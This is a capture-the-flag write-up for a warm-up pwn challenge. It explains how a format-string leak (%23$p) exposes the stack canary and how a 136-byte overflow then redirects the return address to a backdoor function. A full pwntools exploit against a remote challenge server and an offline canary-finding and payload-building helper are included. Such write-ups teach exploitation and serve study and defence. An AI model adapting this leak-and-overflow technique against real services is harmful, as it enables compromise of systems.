Source: ASIS-CTF-Finals-2017
Description: a very simple warm-up pwn
The binary is compiled with a stack canary, so a plain overflow would just abort in __stack_chk_fail. Two bugs work together: a format-string vulnerability in one menu option lets us read the canary off the stack (it sits at the 23rd printf argument position, so `%23$p` prints it), and a stack overflow in another option lets us write 136 bytes of padding, the leaked canary back in place, a fake saved rbp, and finally the return address, which we point at the backdoor function at 0x4008DA. Because the canary is rewritten with its own value, the check passes and `ret` jumps to the backdoor.
The exploit is as follows:
```python
from pwn import *

#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)

backdoor_addr = 0x4008DA

# Menu option 2: our input is used as a printf format string,
# so "%23$p" prints the 23rd argument slot, which holds the canary.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'2')
sleep(1)
io.sendline(b'%23$p\n')
canary = int(io.recvline().strip(), 16)
info('canary: ' + hex(canary))

# Menu option 1: the read overflows a 136-byte buffer. Rewrite the canary
# with its own value, supply a dummy saved rbp, then the return address.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)
io.interactive()
```
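The exploit above hard-codes two numbers, the `%23$p` offset and the 136 bytes of padding, that you normally have to find yourself. The following is an added example, not part of the original writeup, showing how to do that offline: it walks a list of `%n$p` leaks looking for a word shaped like a glibc canary (low byte 0x00, not a text or stack pointer), validates the leak before trusting it, and builds the same canary + rbp + return-address payload with `struct` so it runs without pwntools. The leak values in `SAMPLE_LEAKS` are constructed for this demonstration; only `0x4008DA` and the 136-byte padding come from the writeup.

```python
import struct

# From the writeup: backdoor address and distance from buffer start to the canary.
BACKDOOR_ADDR = 0x4008DA
PADDING_LEN = 136


def parse_leaked_canary(line: bytes) -> int:
    """Turn one %p leak ("0x..." or "(nil)") into an int and sanity-check it as a canary."""
    text = line.strip().decode()
    if text == "(nil)":
        raise ValueError("leaked word is NULL, wrong offset")
    if not text.startswith("0x"):
        raise ValueError(f"unexpected leak format: {text!r}")
    value = int(text, 16)
    if value >> 64:
        raise ValueError("more than 64 bits leaked")
    # glibc forces the low byte of the canary to 0x00 so str* functions stop at it.
    if value & 0xFF != 0:
        raise ValueError(f"low byte is {value & 0xFF:#x}, not a glibc canary")
    return value


def looks_like_canary(value: int) -> bool:
    """Heuristic: canary-shaped word that is not a non-PIE text pointer or a stack/libc pointer."""
    low_byte_zero = (value & 0xFF) == 0
    nontrivial = (value >> 8) != 0
    text_ptr = 0x400000 <= value < 0x800000          # non-PIE x86-64 .text/.data range
    high_ptr = (value >> 40) in (0x7F, 0x7E)          # typical stack / libc mappings
    return low_byte_zero and nontrivial and not text_ptr and not high_ptr


def find_canary_offset(leaks) -> int:
    """leaks[n-1] is the output of "%n$p". Return the first n whose word looks like a canary."""
    for n, raw in enumerate(leaks, start=1):
        try:
            value = parse_leaked_canary(raw)
        except ValueError:
            continue
        if looks_like_canary(value):
            return n
    raise LookupError("no canary-like word in the leaked range")


def build_payload(canary: int, ret_addr: int = BACKDOOR_ADDR, saved_rbp: int = 0) -> bytes:
    """Padding up to the canary, the canary itself, a fake saved rbp, then the return address."""
    payload = b"a" * PADDING_LEN
    payload += struct.pack("<Q", canary)      # canary must match or __stack_chk_fail aborts
    payload += struct.pack("<Q", saved_rbp)   # saved rbp; any value is fine for a ret2backdoor
    payload += struct.pack("<Q", ret_addr)    # overwritten return address
    assert len(payload) == PADDING_LEN + 24
    return payload


# Constructed sample of what "%1$p" .. "%25$p" might print; slot 23 is the canary.
SAMPLE_LEAKS = (
    [b"0x7ffd3c2a1e40", b"(nil)", b"0x7f2c5e9b8a20", b"0x25", b"0x1"] * 4   # slots 1-20
    + [b"0x4008dc", b"0x7ffd3c2a1f70"]                                     # slots 21-22
    + [b"0x5a3c9f1e7b2d4600"]                                              # slot 23: canary
    + [b"0x7ffd3c2a1f80", b"0x4009a0"]                                     # slots 24-25
)

if __name__ == "__main__":
    n = find_canary_offset(SAMPLE_LEAKS)
    canary = parse_leaked_canary(SAMPLE_LEAKS[n - 1])
    print(f"canary at %{n}$p = {canary:#x}")
    print(build_payload(canary).hex())
```

In practice you generate the leak list by sending `%1$p`, `%2$p`, ... to the vulnerable option (or several `%p` in one string) and feed the replies to `find_canary_offset`; the padding length still comes from the disassembly (distance between the buffer and the canary slot in the vulnerable function's frame).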